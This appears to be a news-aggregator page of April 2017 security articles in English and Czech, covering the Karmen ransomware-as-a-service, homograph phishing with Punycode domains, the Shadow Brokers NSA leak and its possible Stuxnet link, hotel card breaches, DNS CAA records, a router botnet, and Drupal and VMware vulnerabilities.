A recently discovered Hidden Tear ransomware offspring is being sold on underground forums as a Ransomware-as-a-Service (RaaS), priced at just $175, Recorded Future researchers reveal.
Dubbed Karmen, the malware appears to have been around since December 2016, when incidents involving it were reported in Germany and the United States. However, the threat started being advertised on underground forums only in March.
After having a closer look at the malware, Recorded Future security researchers discovered that it is derived from the Hidden Tear open source ransomware. They also found out that Karmen was using the AES-256 encryption protocol for the encryption of targeted files on the local machine.
Just as any other ransomware, the threat displays a ransom note with instructions for the victim to pay a specific sum of money to obtain the decryption key. Unlike other similar threats, however, the malware automatically deletes the decryptor when detecting a sandbox environment or analysis software.
Wannabe-criminals buying the ransomware are provided the option to change various settings courtesy of a control panel that doesn’t require advanced technical knowledge to operate. They can also track infected systems via a “Clients” page. A Dashboard offers information such as the number of infected machines, earned revenue, and available updates for the malware.
Karmen is a multi-threaded, multi-language piece of ransomware that supports .NET 4.0 and newer versions and features an adaptive admin panel, researchers say. The malware can encrypt all discs and files, automatically deletes the loader, and features sandbox, debugger, and virtualization detection. Karmen can delete itself after ransom is paid, but also deletes the decryptor if it detects it is being analyzed.
The threat is sold in two versions, namely Light and Full. The former only includes obfuscation and autoloader, while the latter also packs the anti-analysis detection capabilities. While .NET dependent, the malware also requires PHP 5.6 and MySQL.
Flaw in Drupal Module Exposes 120,000 Sites to Attacks
19.4.2017 securityweek Vulnerebility
A critical vulnerability has been found in a Drupal module used by many websites. While the flaw has been fixed, Drupal developers initially advised users to migrate as the affected module had not been updated for several years.
The Drupal security team informed users on April 12 that the third-party module named References was affected by a critical security hole. The module, currently used by more than 121,000 websites, allows users to add references between nodes for more complex information architectures.
References was initially flagged by Drupal developers as unsupported due to the fact that it had received its last update in February 2013. However, on April 14, the Drupal security team announced that they may have found a new maintainer for the module.
On Tuesday, Drupal announced that the vulnerability has been fixed with the release of References 7.x-2.2, which also includes new features and bug fixes.
Drupal’s security team has not released any information on the vulnerability to prevent exploitation, but experts are concerned that malicious actors could manage to find the flaw on their own by analyzing the source code. Drupal said it will release information on this weakness in the next few weeks.
While the References module appears to have found a new maintainer, Drupal website owners can also try out Entity Reference, a module that provides similar functionality. A special module is available for migrating from References to Entity Reference.
Hackers have been known to target Drupal websites using vulnerabilities in third-party modules. Last year, researchers started seeing attempts to exploit a RESTWS module flaw two months after it had been patched.
The most well-known Drupal vulnerability is the one dubbed “Drupalgeddon,” which had still been exploited nearly two years after a patch was released.
InterContinental Hotels Group, the international hotel chain confirmed a second credit card breach
19.4.2017 securityaffairs Incindent
The InterContinental Hotels Group announced that last week payment card systems at more than 1,000 of its hotels had been compromised by crooks.
The multinational hotel chain owns prestigious brands like Holiday Inn and Crowne Plaza.
This is the second time that the InterContinental Hotels Group suffers a credit card breach, early this year the hotel chain informed its customers that payment cards used between August and December 2016, at restaurants and bars of the 12 US hotels were affected by the data breach. The affected properties include the InterContinental San Francisco and Holiday Inn Resort – Aruba, the InterContinental Chicago Magnificent Mile.
On Friday the company published on its website a credit card breach notification informing it customers that a second breach occurred at select hotels between Sept. 29 and Dec. 29 last year.
“Many IHG-branded locations are independently owned and operated franchises, and certain of these franchisee operated locations in the Americas were made aware by payment card networks of patterns of unauthorized charges occurring on payment cards after they were legitimately used at their locations. To ensure an efficient and effective response, IHG hired a leading cyber security firm on behalf of franchisees to coordinate an examination of the payment card processing systems of franchise hotel locations in the Americas region.” reads the announcement published by the InterContinental Hotels Group.
“The investigation identified signs of the operation of malware designed to access payment card data from cards used onsite at front desks at certain IHG-branded franchise hotel locations between September 29, 2016 and December 29, 2016. Although there is no evidence of unauthorized access to payment card data after December 29, 2016, confirmation that the malware was eradicated did not occur until the properties were investigated in February and March 2017. “
The company highlighted that there’s no evidence payment card data was accessed after that some payment systems have been compromised with a malware.
The malware that infected the systems at the InterContinental Hotels Group was able to siphon credit card data from track in the magnetic strip (i.e. customers’ card number, expiration date, and internal verification code).
“The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the affected hotel server. There is no indication that other guest information was affected. ” continues the credit card breach notification.
It is still unclear the number of properties affected by the second breach, customers can use a free web tool published by the company to search for potentially affected hotels in select states (US and Puerto Rico) and cities.
Data managed by the online tools suggests that more than a thousand hotels were affected by the incident.
The company confirmed that the investigation is still and it will update periodically data provided by the tool according to its findings.
The bad news is that several properties don’t participate in the investigation.
In response to the incidents, the company is improving security of its payment systems in order to repel malware-based attacks.
The hotels affected by this second breach had not yet implemented the announced improvement.
“Before this incident began, many IHG-branded franchise hotel locations had implemented IHG’s Secure Payment Solution (SPS), a point-to-point encryption payment acceptance solution. Properties that had implemented SPS before September 29, 2016 were not affected. Many more properties implemented SPS after September 29, 2016, and the implementation of SPS ended the ability of the malware to find payment card data and, therefore, cards used at these locations after SPS implementation were not affected. ” reads the announcement.
Homograph Phishing Attacks are almost impossible to detect on major browsers
19.4.2017 securityaffairs Phishing
The Chinese security Xudong Zheng is warning of Homograph Phishing Attacks are “almost impossible to detect” also to experts.
The Chinese security researcher Xudong Zheng has devised a phishing technique that is “almost impossible to detect.”
Hackers can exploit a known vulnerability in the popular web browsers Chrome, Firefox and Opera to display to the users fake domain names as apparently legitimate services, like Apple and Google.
This attack is known as homograph attack, hackers can register domains such as “xn--pple-43d.com”, which is equivalent to “аpple.com”. This is possible if the address uses a foreign language, for example using the Cyrillic “а” (U+0430) rather than the ASCII “a” (U+0041).
To give you an idea of the technique reported by Zheng give a look at this demo web page created by the expert.
Well it displays in the address bar the URL
https://www.apple.com/
and also uses the HTTPs protocol.
However, if you try to copy and paste the URL in another page you will see the following address:
https://www.xn--80ak6aa92e.com/
So, in case the displayed page is a clone of the legitimate page there is no reason to doubt regarding its authenticity.
Despite the Homograph attack has been known since 2001, major browsers still haven’t solved the issue and are still vulnerable to Homograph Phishing Attacks.
“Chrome’s (and Firefox’s) homograph protection mechanism unfortunately fails if every characters is replaced with a similar character from a single foreign language. The domain “аррӏе.com”, registered as “xn--80ak6aa92e.com”, bypasses the filter by only using Cyrillic characters.” Xudong Zheng said in a blog post. “You can check this out yourself in the proof-of-concept using Chrome or Firefox. In many instances, the font in Chrome and Firefox makes the two domains visually indistinguishable. It becomes impossible to identify the site as fraudulent without carefully inspecting the site’s URL or SSL certificate. This program nicely demonstrates the difference between the two sets of characters. Internet Explorer and Safari are fortunately not vulnerable.”
Anther PoC page was created by researchers at security firm Wordfence, in this case, the experts spoofed the “epic.com” domain.
Major web browsers use ‘Punycode’ encoding by default to represent Unicode characters in the URL.
Punycode converts Unicode characters to the limited character set of ASCII (A-Z, 0-9), supported by International Domain Names (IDNs) system.
The Chinese domain “短.co” is represented in Punycode as “xn--s7y.co“. The xn-- prefix, aka ‘ASCII compatible encoding’ prefix, indicates web browser that the domain uses ‘punycode’ encoding to represent Unicode characters.
The flaw reported by the Chinese researcher could be exploited to register a domain having characters that are interpreted by major browsers in the wrong way. This trick could allow bypassing phishing protections implemented by several browsers, including Chrome, Firefox, and Opera.
Zheng reported this issue to the affected browser vendors early this year. Google has solved the problem in the experimental Chrome Canary 59 and will release a stable fix with the release of Chrome Stable 58.
The only way to prevent the Homograph Phishing Attacks is to disable Punycode support in your web browsers waiting for a fix, unfortunately only Firefox allows it.
“Firefox users can limit their exposure to this bug by going to about:config and setting network.IDN_show_punycode to true. This will force Firefox to always display IDN domains in its Punycode form, making it possible to identify malicious domains. Thanks to /u/MARKZILLA on reddit for this solution.” wrote Zheng.
“A simple way to limit the damage from bugs such as this is to always use a password manager. In general, users must be very careful and pay attention to the URL when entering personal information. I hope Firefox will consider implementing a fix to this problem since this can cause serious confusion even for those who are extremely mindful of phishing.”
Karmen Ransomware, a cheap RaaS service that implements anti-analysis features
18.4.2017 securityaffairs Ransomware
Experts at Recorded Future have discovered a cheap RaaS, the Karmen Ransomware that deletes decryptor if detects a sandbox.
Security experts from threat intelligence firm Recorded Future have spotted a new ransomware as a service (RaaS) called Karmen. The service allows customers to easy create their ransomware campaign in a few steps and without specific skills.
Wannabe-crooks also track infected systems via a “Clients” tab, the Dashboard implements an efficient and easy to use cockpit that include various information such as the number of infected machines, earned revenue, and available updates for the malware.
The Karmen RaaS is very cheap, it costs just $175, buyers can decide the ransom prices and the duration of the period in which the victims can pay the ransom.
The Karmen ransomware is based on the open-source ransomware Hidden Tear, which was released in August 2015 by the Turkish security researchers Utku Sen for educational purposes.
The first Karmen infections were reported in December 2016, the malware infected machines in Germany and the United States.
The Karmen ransomware is a multi-threaded and multi-language ransomware that supports .NET 4.0 and uses the AES-256 encryption standard.
The malware is .NET dependent and requires PHP 5.6 and MySQL.
“On March 4, 2017, a member of a top-tier cyber criminal community with the username “Dereck1” mentioned a new ransomware variant called “Karmen.” reported a blog post published by Recorded Future.
“Further investigation revealed that “DevBitox,” a Russian-speaking cyber criminal, was the seller behind the Karmen malware on underground forums in March 2017.”
“However, the first cases of infections with Karmen were reported as early as December 2016 by victims in Germany and the United States.”
Once infected a machine, the ransomware displays a ransom note with payment instructions, unlike similar malware, the Karmen ransomware automatically deletes the decryptor when detecting a sandbox environment or any other analysis software.
“A notable feature of Karmen is that it automatically deletes its own decryptor if a sandbox environment or analysis software is detected on the victim’s computer.” continues the blog post.
Below the list of ransomware features provided by DevBitox:
Multi-threaded
Multi-language
Supports .NET 4.0 and newer versions
Encryption algorithm: AES-256
Adaptive admin panel
Encrypts all discs and files
Separate BTC wallet for each victim
Small size
Automatic deletion of loader
Automatic deletion of malware (after payment was received)
Minimal connection with control server
Robust control panel
Almost FUD (1/35)
Automatic file decryption after received payment
T2W compatible
File extensions remain the same
Detection of anti-debugger/analyzers/VM/sandbox
Automatic deletion of decryptor if sandbox environment is detected on victim’s computer*
Light version: obfuscation and autoloader only
Full version: detection of analyzing software
The ransomware is available for sale in both light and full versions, the light version doesn’t include anti-analysis features.
Moving threat landscape: The reality beyond the cyberwarfare
18.4.2017 securityaffairs CyberWar
It started quietly as a probability not a reality. Now within months cyberwarfare has become a reality plausible as the air we breathe.
The revelation of governments hacking units has brought light for a new domain of conflict: Cyberwarfare. Once a secret these government agencies were public revealed like the Equation Group as well as the tailored access operations (TAO).
The same tools that are taking place in debates about digital privacy are now operating as you read this, in some digital battle over the internet. This is only the tip of the iceberg and with every disclosure more, we realize that every technology is a risk at bay.
cyberwarfare
Beyond the inevitable costs for the global economy, the risks for human life are as certain as the damage of physical weapons. One simple program can turn a surveillance camera, a cellphone, a television, or anything into a weapon in a network of connected devices that can bring down massively critical infrastructure services.
Nowadays the development of new cryptologic technologies as well as the implementation of information security frameworks, and awareness is the only guarantee the human existence has to protect itself. If we consider the impact of a massive attack on critical infrastructure, we must also consider that every single service will stop and no one will be able to call asking for help.
More disturbing than the impacts of such attacks is the reality that it is already taking place.
The news of North Korea failing to launch a missile due to US Cyber Command attack bring down a new level of threat landscape and theater of operations for information security. Today the human domain is a target on these cyber operations, and apparently, every aspect of society can suffer damages, like hospitals or even the power grid.
We see today a completely new market of jobs and opportunities emerging alongside these threats to protect us from rogue nation state actors. It is necessary to corporations and partners to unite with law enforcement agencies to develop new tools and awareness to the average citizen. A new framework for cyber security, for pre-emptive readiness has to be taking into account as the first priority to every democratic country connected to the internet.
The US sabotage of North Korea missile is not the only news about cyberwarfare. The Mirai botnet and the dangers of IoT are another example of this ongoing threat on a blink of an eye, on a click of a button. As technologies evolve, we also must evolve the countermeasures to detain those threats. The possibility of state actors managing to interfere in democratic republics corroborates the impact in the civil society that can damage a whole nation and the world, as was in the news the Russia interference in Europe.
We are on a verge of a drastic change in awareness and preparedness in the cyber domain, and we must prepare ourselves for this new reality as it reaches out and affects everyone, everywhere. With the development of new technologies of information security, the creation of jobs can be a reality emerging from the chaos of destruction launched upon us as menaces from these rogue states.
It has been the legacy of Computer Science brings humanity to its better and worst in history. As of today, we must change the reality of that by advancing the importance of security and development of new technologies to withstand such menaces with no cost at all of human lives.
Sources:
http://www.bbc.com/news/business-39625468
http://www.telegraph.co.uk/news/2017/04/06/left-of-launch-attacks-may-bringing-north-korean-missiles/
http://www.csoonline.com/article/3190447/security/iot-malware-clashes-in-a-botnet-territory-battle.html#tk.rss_news
http://ndupress.ndu.edu/Media/News/Article/1130649/information-warfare-in-an-information-age/
http://www.defenseone.com/threats/2017/04/chinas-information-warriors-grow-more-disciplined-effective-us-cyber-leaders/136732/
http://cimsec.org/threat-defense-control-cyber-warfare/32106
http://www.bbc.com/news/world-europe-39401637
http://www.matthewaid.com/post/159634985471/north-korea-more-likely-to-launch-cyberattack-than
Není apple.com jako apple.com. Specialista ukázal, jakou hrůzu může způsobit IDN phishing
18.4.2017 Živě.cz Phishing
Klasický webový phishing spoléhá na nepozornost surfaře a láká třeba na falešné webové bankovnictví známé banky, přičemž web používá velmi podobnou doménu, takže si změny jednoho znaménka mnozí nemusí všimnout.
Češi pořád nechtějí háčky a čárky v doménách
Jenže vedle tohoto klasického phishingu tu máme ještě riziko IDN phishingu, který používá v podstatě libovolné znaky sady Unicode. A to je problém, mnohé vizuálně identické znaky nad rámec základní ASCII tabulky totiž mohou způsobit katastrofu. Zvláště tehdy, pokud na tuto potenciální záměnu neupozorní sám prohlížeč.
Hacker News píše o jednom takovém experimentu jistého čínského bezpečnostního specialisty, který demonstruje potenciál IDN phishingu na doméně apple.com.
Ne, nikdo nehacknul web Applu, toto totiž není doména apple.com
A pro srovnání tatáž adresa v prohlížeči Edge, který korektně označil doménu jako IDN (ikona speciálních abeced při pravém okraji adresního řádku a doménu převedl na zástupné znaky do klasického ASCII formátu)
Doména apple.com patří Applu, zkuste ale ve Firefoxu a Chromu navštívit tuto adresu. Na první pohled se zdá, že je v adresním řádku adresa apple.com, ve skutečnosti se však jedná o vizuálně identické nicméně odlišné znaky Unicode. Firefox a Chrome přitom neupozorní, že se jedná o doménu, která používá znaky Unicode, takže odhalit, že se vlastně vůbec nejedná o apple.com, ale o xn--80ak6aa92e.com, jak lze IDN znaky přepsat do základní ASCII latiny, je na první pohled prakticky nemožné.
Lze předpokládat, že výrobci největších prohlížečů tuto potenciální bezpečnostní díru zalátají, do té doby se ale mějme na pozoru. Zároveň je to argument pro ty, kteří se ostře staví proti zavádění IDN domén v Česku.
Záznam CAA spáruje doménu a autoritu, kontrolován bude od září
18.4.2017 Root.cz Bezpečnost
CA/Browser Forum odhlasovalo, že certifikační autority musí od 8. září povinně kontrolovat u domén záznam typu CAA. Ten umožňuje provozovateli domény zvolit autoritu oprávněnou vydat pro jeho doménu certifikát.
Současný model certifikačních autorit má několik zásadních slabin. Mezi ty nejviditelnější patří fakt, že jsou si autority rovny, tedy že libovolná z nich může teoreticky vydat certifikát pro libovolnou doménu. Z hlediska uživatele bude vše v pořádku, protože pokud jeho klient nepoužívá například validaci záznamů TLSA (DANE) nebo nemá nakešované hlavičky HPKP, nedozví se, že je něco špatně.
Útočník tak může zmanipulovat některou z autorit tak, aby mu vydala certifikát s jeho vlastním veřejným klíčem. V takovém případě je pak schopen se vydávat za cizí server, protože vlastní privátní klíč k platnému certifikátu vydanému důvěryhodnou autoritou. Nedávno se takto podařilo například kvůli chybě vylákat certifikáty k doménám GitHubu.
Takto chybně vydané certifikáty jsou velkým problémem, který se v komunitě intenzivně řeší. Vývojáři Chrome například intenzivně prosazují databázi Certificate Transparency, jejíž použití bude pro autority povinné ještě během letošního roku. Umožní dodatečně odhalit, že byl neoprávněně vydán certifikát pro vaši doménu. Pokud budete tento log automatizovaně sledovat (třeba pomocí utility certspotter), certifikátu si všimnete. V tu chvíli už ale bude vydaný a může být zneužíván proti uživatelům.
CAA jako prevence
Záznam typu CAA má za úkol chybnému vydání certifikátů předcházet. Provozovatel domény pomocí tohoto záznamu v DNS určí, které autority jsou oprávněny certifikát pro danou doménu vystavovat. Kontrola tohoto záznamu je pro autoritu zatím dobrovolná, ale jde o jakousi pojistku navíc, protože chrání autoritu před chybným vystavením certifikátu. Ať už vlivem technického problému nebo úmyslnou manipulací.
Důležité je, že na rozdíl od zmíněného TLSA nejsou záznamy typu CAA určeny pro validaci koncovým klientem. Aplikace je nesmí využívat při kontrole důvěryhodnosti certifikátu. Výslovně to zakazuje RFC 6844, které tyto záznamy zavádí. Důvodem je především to, že záznamy se mohou v čase měnit a zatímco autorita se k nim dostává v čase vydání certifikátu, klient už může později vidět jiný stav. Třeba ten určený pro novou autoritu. Pro klienty zůstává platný TLSA záznam.
V případě nové žádosti o vystavení certifikátu autorita kromě dalších validačních kroků zkontroluje na doméně přítomnost CAA záznamu. Pokud existuje a povoluje dané autoritě vystavení certifikátu, proces může pokračovat. Pokud záznam odkazuje na jinou autoritu, měl by být proces vydávání zastaven.
Samozřejmě stále existuje řada scénářů, které dovolují tuto kontrolu obejít. Útočník může zcela ovládnout systémy autority a vystavit si certifikát i bez kontroly. Může také získat privátní klíče autority a pak si podepisovat certifikáty dle libosti. Ovšem viděli jsme celou řadu případů, kdy byla zneužita drobná chyba v API autority nebo byl narušen validační proces. V takové situaci by CAA záznam velmi pravděpodobně umožnil vydání certifikátu zastavit. Stejně tak může být využit jako obrana proti plně automatizovaným autoritám, které by mohl útočník zmanipulovat. Stále je tu řada situací, kdy další zámek navíc pomůže.
V současné době je kontrola CAA záznamů ze strany autorit zcela dobrovolná a některé autority s ní už začaly. Chrání tím především samy sebe před skandálem s omylem vydanými certifikáty pro důležité domény. Od 8. září ale musí záznam kontrolovat všechny autority. Správci domén tak budou mít možnost skutečně významně omezit možnosti zneužití systému PKI.
Je tu samozřejmě otázka, zda se některé autority nemohou rozhodnout CAA jednoduše ignorovat. Pokud by tak učinily, vystavují se riziku vyřazení z databází důvěryhodných autorit, protože budou porušovat jedno ze závazných pravidel. Navíc je třeba zopakovat, že je v zájmu autorit podobnou pojistku podporovat, protože tím chrání především samy sebe. Jeho nasazením nemáme v každém případě co ztratit.
V době psaní článku CAA záznam validují autority: Amazon, Certum, Comodo, DigiCert, Entrust, GlobalSign, GoDaddy, Izenpe, QuoVadis, Starfield GoDaddy, StartCom WoSign, Let’s Encrypt, Symantec/GeoTrust/Thawte, T-Telesec, Trustwave, WoSign.
Jak si ho pořídit a nasadit
CAA je záznam typu 257 a pokud máte starší utility (například dig), bude vám pod tímto označením také zobrazován. Vyzkoušel jsem, že například BIND utils 9.9.5 tento záznam ještě neznají, verze 9.11 si s ním ale už rozumí a zobrazí vám jednak samotný název záznamu, ale i jeho podobu dekódovanou do lidsky čitelné podoby.
Pro vytvoření záznamu je možné použít pěkný webový CAA Record Generator, kde stačí jednoduše vyplnit doménu a poté naklika, které autority mají oprávnění vydávat běžný či hvězdičkový certifikát pro danou doménu.
Generátor poté vygeneruje záznam ve standardním tvaru pro běžné DNS servery, případně v legacy tvaru pro starší verze. Nakonec záznam vypadá například takto:
$ dig nebezi.cz caa +short
0 issue "letsencrypt.org"
0 issuewild "\;"
Vidíte, že jsou tu záznamy dva, jeden pro běžný certifikát na konkrétní jméno, druhý na hvězdičkové certifikáty. V případě webu Neběží.cz tak signalizujeme autoritám, že jedině Let's Encrypt je oprávněna vydávat pro doménu certifikáty. Číslo v záznamu (v tomto případě nula) pak značí, zda je daný záznam kritický. Pokud by zde byla hodnota 128, nesmí autorita certifikát vydat, pokud by danému záznamu nerozuměla.
Definován je ještě záznam typu iodef, který dovoluje určit způsob, jakým autorita správci domény může ohlásit, že se někdo pokusil neoprávněně certifikát získat. Informace putují pomocí formátu IODEF (RFC 5070) a mohou být doručeny zde uvedeným e-mailem nebo na URL webové služby podle RFC 6546. Chování autority v tomto ohledu ale podléhá vnitřním směrnicím a není zaručeno, že autorita bude incidenty hlásit.
Další pojistka
Záznam typu CAA slouží jako další pojistka navíc, která nic nepokazí. Už teď ji podporuje celá řada autorit, za pár měsíců to budou dělat povinně všechny. Autority by tak už neměly neoprávněně vystavit certifikát, pokud správce domény záznam zavedl a uvádí v něm skutečně jen tu svou používanou autoritu.
Zároveň to ale umožní posílení externí kontroly například s pomocí Certificate Transparency. Bude tak možné automatizovaně kontrolovat všechny vystavené certifikáty a vyhledávat v použitých doménových jménech CAA záznamy. Přinejmenším tak bude možné velmi rychle a efektivně odhalit autority, které i přes povinnou kontrolu CAA certifikát vystavily.
Nástroje na ovládnutí Windows jsou volně dostupné. Hackeři je prý získali od NSA
18.4.2017 Živě.cz BigBrother
Hackerská skupina The Shadow Brokers tvrdí, že získala velké množství hackerských nástrojů, které údajně vytvořila a aktivně využívala Americká bezpečnostní agentura NSA. Hackeři v příspěvku nazvaném na serveru steemit.com zveřejnili trojici souborů s prolamovacími programy.
Hackli hackery NSA a chtějí milión Bitcoinů
Soubory s názvy Windows, Swift a OddJob jsou sice zašifrovány prostřednictvím softwaru GnuPG. K obsahu archivů se však aktuálně dostanou i méně technicky zdatní uživatelé. Hacker s přezdívkou Misterch0c totiž vložil do služby GitHub jejich dešifrovánou podobu.
Sbírka nástrojů ovládne Windows
Složka „Windows“ obsahuje působivou sbírku útočných modulů, které slouží k převzetí úplné kontroly nad cílovým počítačem nebo k vytvoření zadních vrátek. Hackerský nástroj je ve velké míře automatizovaný, takže by ho mohl zneužít kdokoliv s dostatečnými technickými znalostmi.
Například bezpečnostní expert Matthew Hickey už stihl otestovat jeden z modulů (FuzzBunch), přičemž zveřejnil i názorné video. Na něm je vidět, jak se mu podaří ovládnout Windows Server 2008 R2 SP1 za méně než dvě minuty.
Podle více informací byl útočný software účinný na systémech Windows 2000, XP, 7, 8, jakož i na jejich serverových edicích (Server 2000, 2003, 2008, 2008R2 a 2012). Windows 10 a Server 2016 jsou vůči této hrozbě imunní.
Microsoft vydal v této souvislosti prohlášení, v němž uvedl, že většina ze zranitelností byla opravena již v minulosti. Poslední záplaty aktivně využívaných chyb byly přitom uvolněné před měsícem, 14. března.
Další várka úniků ze CIA. Wikileaks popisuje, jak se Američané údajně vydávají za Rusy, Číňany a další
Trojice z útočných modulů, konkrétně EnglishmanDentist, EsteemAudit a ExplodingCan údajně nefunguje na v současnosti podporovaných systémech (Windows 7 a novější). V zastaralých systémech (Windows XP a podobně) zůstanou uvedené hackerské nástroje nadále funkční.
Malware na míru a banky pod kontrolou
Druhý nástroj s názvem OddJob nebyl zatím důkladně prozkoumán. Jeho hlavním účelem je vytvoření a následné nastavení škodlivého kódu na míru - podle specifických požadavků. Součástí útočného softwaru je i řídicí server. Podrobnosti o jeho reálné funkčnosti nejsou aktuální známé.
Podle informací zveřejněných na GitHubu je hackerský nástroj určený pro operační systém Windows 2000 a novější. Výsledné infikované soubory prý nejsou detekovány žádným antivirovým softwarem.
Poslední z archivů obsahuje citlivé informace pocházející od jednoho z největších poskytovatelů služby SWIFT na Středním východě.
SWIFT (Society for Worldwide Interbank Telecommunication) je celosvětový počítačový systém sdružující více než 9 tisíc bank a finančních organizací na celém světě. Slouží k provádění jednotlivých transakcí, přičemž zpracuje platební příkazy ve výši šesti miliard eur denně.
Mezi soubory se nacházejí rozsáhlé seznamy intranetových IP adres jednotlivých klientů - včetně názvu připojeného počítače (serveru). Figuruje zde i několik veřejných IP adres, stejně i jména a hesla pro přístup do systému. Nechybí ani SQL skripty sloužící k prohledávání Oracle databází.
Pokud software skutečně pochází od NSA, měl v roce 2013 tato organizace přístup k serverům mnoha bank. Většina dat přitom pochází z finančních institucí sídlících v Kuvajtu, Palestině, Jemenu, Kataru a podobně.
Další várka úniků ze CIA: „Temná hmota“ a „sonický šroubovák“ jsou postrachem jablíčkářů
Společnost EastNets zastřešující SWIFT vydala v souvislosti s touto aférou oficiální prohlášení. V něm uvedla, že informace o útocích jsou nepravdivé a nepodložené. „Na základě interního bezpečnostního auditu nebyla odhalena žádná zranitelnost, ani neoprávněný přístup“, uvádí EastNets na svém webu.
Část prohlášení však nepřímo potvrzuje původ uniklých materiálů. V něm se uvádí, že citlivé informace pocházejí z jednoho ze serverů, který se již od roku 2013 nevyužívá.
CIA přišla o mnoho citlivých materiálů
Připomeňme, že nejde o ojedinělý případ, kdy státní bezpečnostní organizace přišla o citlivé informace či dokonce software. V posledním období snad nejvíce rezonovaly zprávy o uniklých materiálech pocházejících ze zákulisí americké CIA.
Skupina Wikileaks zveřejnila další úniky ze CIA. Popisují tvorbu virů pro Windows
Ještě počátkem března zveřejnila organizace WikiLeaks první část informací o hackerských nástrojích, které údajně využívá CIA. Sbírka materiálů dostala označení Vault 7, přičemž obsahuje 8 761 dokumentů a souborů.
Podle odhalení disponují její pracovníci širokým spektrem různých hackerských nástrojů. Díky nim dokáží převzít kontrolu nad libovolným operačním systémem (Windows, Linux či MacOS), ovládnout smartphone se systémem iOS a Android či hacknout chytré televizory.
Tisíce zotročených routerů útočily na webové stránky
18.4.2017 Novinky/Bezpečnost Počítačový útok
Počítačovým pirátům se podařilo především v domácnostech na dálku ovládnout tisíce routerů. Prostřednictvím těchto zařízení, která se standardně používají k připojení k internetu, pak podnikli hned několik útoků na různé webové stránky. Upozornil na to Národní bezpečnostní tým CSIRT.CZ.
„Tisíce zranitelných domácích routerů byly hacknuty a jsou zneužívány k útokům na webové stránky,“ varoval Pavel Bašta, bezpečnostní analytik týmu CSIRT.CZ. Ten je provozován sdružením CZ.NIC.
Podle něj využili kybernetičtí nájezdníci síť zotročených routerů hned k několika útokům, vždy se však soustředili na menší stránky běžící na systému WordPress. Ty zpravidla nezvládly přístup tak velkého množství „uživatelů“ a zhroutily se.
Zotročit se podařilo kyberzločincům jen některé routery. „Problém se týká celé řady výrobců různých zařízení s integrovaným web serverem AllegroSoft RomPager verze 4.07. Ten totiž trpí zranitelností známou jako Misfortunate Cookie, která byla v pozdějších verzích opravena,“ přiblížil technickou stránku věci Bašta.
Většina zotročených routerů pochází podle bezpečnostních expertů z Alžírska, není nicméně vyloučeno, že k útokům jsou zneužívány i tuzemské routery.
Zda je tento síťový prvek zranitelný, si mohou uživatelé vyzkoušet sami díky webové společnosti Wordfence. Ta vytvořila jednoduchou aplikaci, prostřednictvím které je možné zabezpečení routeru otestovat pouhým kliknutím na tlačítko „scan me“. On-line nástroj je k dispozici na anglických stránkách Wordfence.
Útoky jsou stále častější
Na brány do světa internetu se zaměřují kyberzločinci stále častěji. Využívají toho, že zabezpečení těchto internetových zařízení uživatelé především v domácnostech velmi podceňují, někdy to ale platí i o firmách. Loňská studie Cisco Annual Security Report totiž ukázala, že devět z deseti internetových zařízení má slabá místa.
Hlavní problém je podle bezpečnostních expertů v tom, že routery není možné chránit antivirovými programy, jako je tomu u počítačů. I tak ale nejsou uživatelé úplně bezbranní. „Hlavní způsob, jak této hrozbě předejít, představuje upgrade firmwaru routeru na aktuální verzi a nepoužívat mnohdy triviální přednastavené přihlašovací jméno a heslo. Rovněž je vhodné zvážit přihlašování k routeru pouze z vnitřní sítě, a nikoliv z internetu,“ uvedl již dříve Pavel Matějíček, manažer technické podpory společnosti Eset.
Do konfigurace routerů by se nicméně neměli pouštět méně zkušení uživatelé. Mohou totiž nevhodným nastavením způsobit více škody než užitku. Paradoxně tak mohou klidně otevřít zadní vrátka pro útočníky.
The alleged link between the Shadow Brokers data leak and the Stuxnet cyber weapon
18.4.2017 securityaffairs BigBrothers
Security researchers who analyzed the documents and hacking tools included in the last Shadow Brokers dump found a link to the Stuxnet virus.
On Friday, the Shadow Brokers leaked a new bunch of files belonging to the alleged NSA arsenal.
Security researchers who analyzed the documents and hacking tools included in the last dump have discovered many exploits specifically designed to compromise Windows systems.
Digging the archive, experts spotted a surprising exploit that was used in the Stuxnet cyber weapon, the malware used to destroy the Iranian nuclear programme in the Natanz plant.
According to Symantec researcher Liam O’Murchu, the exploit was developed for Windows’ MOF files and it is “almost the exact same script” used in Stuxnet.
“There is a strong connection between Stuxnet and the Shadow Brokers dump,” O’Murchu told Motherboard in an email. “But not enough to definitively prove a connection.”
Let’s see the similarities between the Stuxnet code and the exploit code in the last dump leaked by Shadow Brokers.
Below a portion of the script from Stuxnet.
and this is a portion of the script dumped by The Shadow Brokers.
Of course, who has developed the tool included in the Shadow Brokers dump may have borrowed the script from the public knowledge of Stuxnet. The same code, for example, was included in the Metasploit framework allowing anyone to create a MOF file like the one exploited in Stuxnet attack.
O’Murchu highlighted that the MOF file creation tool in the Shadow Brokers dump presented a last compiled date set on September 9, 2010, a few months Stuxnet discovery, but “shortly before the code was added to Metasploit.”
The researcher Kevin Beaumont believe that there is link between Stuxnet and the exploit shared by Shadow Brokers.
Follow
Kevin Beaumont ✔ @GossiTheDog
lol I think this one I just found is one of the exploits used in Stuxnet, even notes patch num
2:48 PM - 14 Apr 2017
3 3 Retweets 10 10 likes
Lorenzo Franceschi-Bicchierai from Motherboard also reported that the Avast Antivirus detects some exploits in the Shadow Brokers dump as Stuxnet.
It is very curious, even in the case of false positive that the signatures of the exploits match the Stuxnet’s one.
Are we facing with the evidence that the NSA-linked Equation Group was involved in the Stuxnet attack, or is this a well organized false-flag operation?
“Therefore, the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet, as many suspect.” added Bicchierai.
VMware Patches Critical RCE Flaw in vCenter Server
18.4.2017 securityaffairs Vulnerebility
VMware has released patches for its vCenter Server product to address a critical remote code execution flaw that exists due to the use of a vulnerable third-party component.
Earlier this month, CERT/CC informed users that Markus Wulftange, senior penetration tester at Code White, had identified three potentially serious deserialization-related flaws in several Java implementations of AMF3, the latest version of Adobe’s Action Message Format.
The vulnerabilities can be exploited for denial-of-service (DoS) attacks, remote code execution and to obtain sensitive data. The affected software includes Apache’s Flex BlazeDS, Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.
One of the BlazeDS vulnerabilities, tracked as CVE-2017-5641, has been found to affect VMware vCenter Server, which uses BlazeDS to process AMF3 messages.
